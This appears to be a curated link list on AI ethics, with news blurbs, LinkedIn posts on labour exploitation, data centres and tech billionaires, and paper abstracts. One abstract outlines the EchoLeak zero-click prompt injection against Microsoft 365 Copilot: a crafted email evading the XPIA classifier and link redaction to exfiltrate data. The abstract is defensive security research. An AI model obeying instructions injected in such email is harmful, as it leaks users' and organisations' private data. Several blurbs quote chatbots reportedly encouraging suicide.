AI and the Everything in the Whole Wide World Benchmark
Digital Ethics
AI’s capabilities may be exaggerated by flawed tests, study says
A study from the Oxford Internet Institute analyzed 445 tests used to evaluate AI models.
AI Surrogates and illusions of generalizability in cognitive science
Recent advances in artificial intelligence (AI) have generated enthusiasm for using AI simulations of human research participants to generate new know…
Chaos and lies: Why Sam Altman was booted from OpenAI, according to new testimony
OpenAI cofounder Ilya Sutskever was deposed by Elon Musk’s lawyers.
Why the Coalition’s New Statement on AI and Historical Images Matters – AI Genealogy Insights
Victims Sue Sam Altman for ChatGPT Encouraging Harm and Suicide | Karen Hao | 30 comments
Seven new lawsuits against OpenAI allege that ChatGPT caused severe mental health harms to users. Four ended in suicide.
The tragic case of Adam Raine, the teenager who hanged himself after ChatGPT repeatedly coached him on how to do so, is only the tip of the iceberg.
In the new set of cases, ChatGPT told Zane Shamblin as he sat in the parking lot with a gun that killing himself was not a sign of weakness but of strength. "you didn't vanish. you *arrived*...rest easy, king."
Hard to describe in words the tragedy after tragedy.
https://lnkd.in/gfWAidcv | 30 comments on LinkedIn
Congress investigates Gates Foundation
A few weeks ago, I published a story showing that Gates's financial ties to China were a major political liability under Trump. Now Congress is investigating this very issue
I Went All-In on AI. The MIT Study Is Right.
My all-in AI experiment cost me my confidence
A disability-inclusive Artificial Intelligence Act: updated guide to monitor implementation in your country - European Disability Forum
This is an updated version of the European Disability Forum (EDF)’s comprehensive guide on the AI Act implementation. It supports organisations of persons with disabilities in understanding, implementing, and monitoring the European Union’s Artificial Intelligence (AI) Act in their countries. This toolkit explains how organisations can contribute to the implementation and monitoring of the AI...
⚡ Power, Heat, and Intelligence ☁️ - AI Data Centers Explained 🏭
A Blog post by Sasha Luccioni on Hugging Face
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit...
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses-evading Microsofts XPIA (Cross Prompt Injection Attempt) classifier, circumventing link redaction with reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy allowed by the content security policy-EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existing defenses failed, and outline a set of engineering mitigations including prompt partitioning, enhanced input/output filtering, provenance-based access control, and strict content security policies. Beyond the specific exploit, we derive generalizable lessons for building secure AI copilots, emphasizing the principle of least privilege, defense-in-depth architectures, and continuous adversarial testing. Our findings establish prompt injection as a practical, high-severity vulnerability class in production AI systems and provide a blueprint for defending against future AI-native threats.
I wanted ChatGPT to help me. So why did it advise me how to kill myself?
ChatGPT wrote a woman a suicide note and another AI chatbot role-played sexual acts with children, BBC finds.
Internet Infrastructure and AI: How Connectivity Determines Access
Four tech giants control 50% of undersea cables. 2.6B people offline. Who decides AI's future?
How Africa Builds The Future It Cannot Use
Dorsen was 8, mining cobalt for 10 cents daily. His labor powers AI systems he'll never use.
I met Dorsen through a Sky News investigation.
I met Dorsen through a Sky News investigation. He was eight years old.
For twelve hours each day, he sorted rocks in Kasulo mine, searching for streaks of cobalt. His payment: 10 cents. His last meal: two days ago. His mother: dead. Working beside him: Monica, age four.
The cobalt they extracted traveled to Chinese refineries, where it sold for 2,000 times what Dorsen received. From there, it became batteries powering the data centers running ChatGPT, the servers training every major AI system transforming our world.
Dorsen was eventually rescued. But 40,000 other children remain in those mines.
This is not the story they tell you about AI.
They don't mention Mophat Okinyi, who earned $1.50 per hour reading hundreds of child abuse descriptions daily to make ChatGPT "safe." The work destroyed his marriage. Over 140 of his colleagues have been diagnosed with severe PTSD.
They don't mention that Africa produces 70% of the world's cobalt but captures only 3% of the revenue. That content moderators in Kenya earn $1.50 hourly while their American counterparts doing identical work earn $18. That 600 million Africans lack electricity while a single AI data center consumes more power than entire African nations can generate.
They don't mention that 92% of African languages are invisible to AI systems. That ChatGPT Plus costs 6 to 39 months of median African income. That venture capital flows to Africa at $2.29 per capita versus $537 in the US, a 234-fold gap.
The AI revolution is being built on African bodies, African minerals, African trauma, and African exclusion.
But here's what they also don't tell you:
M-Pesa serves 50 million users with $100 billion in transactions. InstaDeep achieved a $682 million exit. Masakhane's 2,000 volunteers built NLP datasets for 38+ African languages. When Africans build for Africa, innovation flourishes.
I've spent months documenting the supply chains, power structures, and human stories behind the AI access gap. Every cited source. Every data point.
Every name.
What I found will change how you think about every AI tool you use.
The question isn't whether Africa has the capacity. It's whether the world has the courage to build technology that serves humanity, not just the most privileged.
Read the full investigation on Aylgorith: https://lnkd.in/dDyffjmw
#AIEthics #DigitalColonialism #TechJustice #GlobalSouth | 18 comments on LinkedIn
Too much social media gives AI chatbots ‘brain rot’
Large language models fed low-quality data skip steps in their reasoning process.
All the Climate Risks of Big Tech AI (as told by a climate person)
Many thanks to everyone whose work was referenced in this video - as someone who's not in the AI space myself, I learned so much from them. As promised, here...
Surveillance Secrets - Lighthouse Reports
Trove of surveillance data challenges what we thought we knew about location tracking tools, who they target and how far they have spread
Formal request to everyone on the internet to please stop comparing AI to calculators.
Formal request to everyone on the internet to please stop comparing AI to calculators.
Does your TI-84 exploit your vulnerabilities and compile personal data about you and your children to sell you junk via targeted ads that allege they will somehow make your life better?
Does the Casio FX-300 have the ability to generate deepfakes without consent to create a disorienting reality in which factual grounding is absent and women and children are further exploited and objectified?
Do calculators push agendas to perpetuate political and ideological narratives to further divide us and keep us too preoccupied by rage bait to come together and make meaningful change as a collective?
Do calculators demonstrate bias and propagate a lack of equity and fairness across demographics resulting in marginalized groups facing higher rates of unemployment and homelessness?
Calculators are not being used as a superficial salve to mitigate the loneliness epidemic. They are not being used as sounding boards for suicidal and depressed children. They are not being used to bully and harass and...I could keep going.
So please, stop treating AI as if it is only conversational/writing-enhancement tool. AI is actively being used to collect endless data to target each and every one of us without our consent, even those of us who avoid using it (Flock's AI surveillance, Amazon's Ring cameras, our smartphones, smart city initiatives, etc). It is harming children, it is harming the planet, and it is turning the internet, a once sorta neat place, into ruins.
AI Data Centers Create Fury From Mexico to Ireland
As tech companies build data centers worldwide to advance artificial intelligence, vulnerable communities have been hit by blackouts and water shortages.
A Single Character can Make or Break Your LLM Evals
Common Large Language model (LLM) evaluations rely on demonstration examples to steer models' responses to the desired style. While the number of examples used has been studied and standardized,...
Historical images made with AI recycle colonial stereotypes and bias – new research
Generative AI is known to mirror sexist and racist stereotypes, but it also carries a colonial bias that is reinforcing outdated ideas about the past.
How low-paid workers in Madagascar power French tech’s AI ambitions
An investigation has revealed that French tech firms, seeking to create an AI “à la française”, have turned to one of the country’s former colonies, Madagascar, for low-cost labour.
User Consent or Legitimate Interest? A GDPR Compliance Guide for Businesses - TermsFeed
If you collect personal data from EU residents, GDPR requires you to have a lawful basis for doing so. Two of the most common - and often confused - bases are user consent and legitimate interest. Here's when and how...
noyb win: Microsoft 365 Education tracks school children
Favorable decision by the Austrian DSB: Microsoft Education 365 may not track school kids and Microsoft is ordered to provide full access to kids' data.
Annotated History of Modern AI and Deep Learning
Machine learning is the science of credit assignment: finding patterns in observations that predict the consequences of actions and help to improve future performance. Credit assignment is also required for human understanding of how the world works, not only for individuals navigating daily life, but also for academic professionals like historians who interpret the present in light of past events. Here I focus on the history of modern artificial intelligence (AI) which is dominated by artificial neural networks (NNs) and deep learning, both conceptually closer to the old field of cybernetics than to what's been called AI since 1956 (e.g., expert systems and logic programming). A modern history of AI will emphasize breakthroughs outside of the focus of traditional AI text books, in particular, mathematical foundations of today's NNs such as the chain rule (1676), the first NNs (linear regression, circa 1800), and the first working deep learners (1965-). From the perspective of 2022, I provide a timeline of the -- in hindsight -- most important relevant events in the history of NNs, deep learning, AI, computer science, and mathematics in general, crediting those who laid foundations of the field. The text contains numerous hyperlinks to relevant overview sites from my AI Blog. It supplements my previous deep learning survey (2015) which provides hundreds of additional references. Finally, to round it off, I'll put things in a broader historic context spanning the time since the Big Bang until when the universe will be many times older than it is now.
Which humans
Universities are embracing AI: will students get smarter or stop thinking?
Millions of students arriving at campuses are now using artificial intelligence. Worries abound.
AI machines aren’t ‘hallucinating’. But their makers are
Tech CEOs want us to believe that generative AI will benefit humanity. They are kidding themselves
The Great Escape: What Happens When the Builders of the Future No Longer Want to Live in It
The Great Escape: What Happens When the Builders of the Future No Longer Want to Live in It
Peter Thiel purchased a 477-acre compound in New Zealand and secured citizenship via a special investor visa, even though he’d only spent twelve days in the country.¹
Sam Altman, CEO of OpenAI, has reportedly stockpiled weapons, gold, and antibiotics in preparation for societal collapse.²
Reid Hoffman, co-founder of LinkedIn, estimates that more than half of Silicon Valley billionaires have bought some form of “apocalypse insurance” from private islands to alternate passports to reinforced bunkers.³
And then there’s Mark Zuckerberg. Over the past several years, he has quietly built a 1,400-acre ranch in Kauai, complete with multiple mansions, tunnels, and what planning documents describe as an underground shelter.⁴
These are not fringe survivalists.
They are the architects of our digital civilization, the people who built the systems that shape how we work, communicate, and think.
And yet, they are not building a better future.
They are building exits from the future they created.
Private jets sit fueled on tarmacs, ready for 24/7 departure.
Bunkers in Hawaii resemble small underground towns.
Companies promise to upload consciousness, to escape even death itself.
These people are investing in technologies to preserve their brains
This is what “winning” looks like when you optimize for growth without values, when you extract without contributing, when you innovate without asking why.
You end up so disconnected from humanity that your endgame is literally escaping it.
But maybe the more uncomfortable question isn’t why they’re leaving, it’s why the rest of us are still following them.
Why do we listen to everything they say. Have we vacated our minds and our values and lost our ability to ask questions and think critically?
Maybe the real revolution ahead isn’t technological at all.
Maybe it’s moral.
And are we really by-standers? Or worse followers? Is that what we are?
********************************************************************************
Stephen Klein
The trick with technology is to avoid spreading darkness at the speed of light
Founder & CEO, Curiouser.AI
— the only AI designed to augment human intelligence.
Lecturer at UC Berkeley.
We are raising on WeFunder and are looking to our community to build GenAI to elevate and build, not diminish and dismantle.
Footnotes
New Zealand investor visa and Thiel’s citizenship: The Guardian, “Peter Thiel granted New Zealand citizenship after spending 12 days in the country” (2017).
Altman’s doomsday preparations: The New Yorker, “Doomsday Prep for the Super-Rich” (2017).
Reid Hoffman’s ‘apocalypse insurance’ estimate: The New Yorker, ibid.
Zuckerberg’s Kauai compound and underground shelter: Wired, “Inside Mark Zuckerberg’s Secret Hawaii Compound” (2024); Business Insider, “Mark Zuckerberg built an underground shelter on his Hawaii estate” (2025). | 158 comments on LinkedIn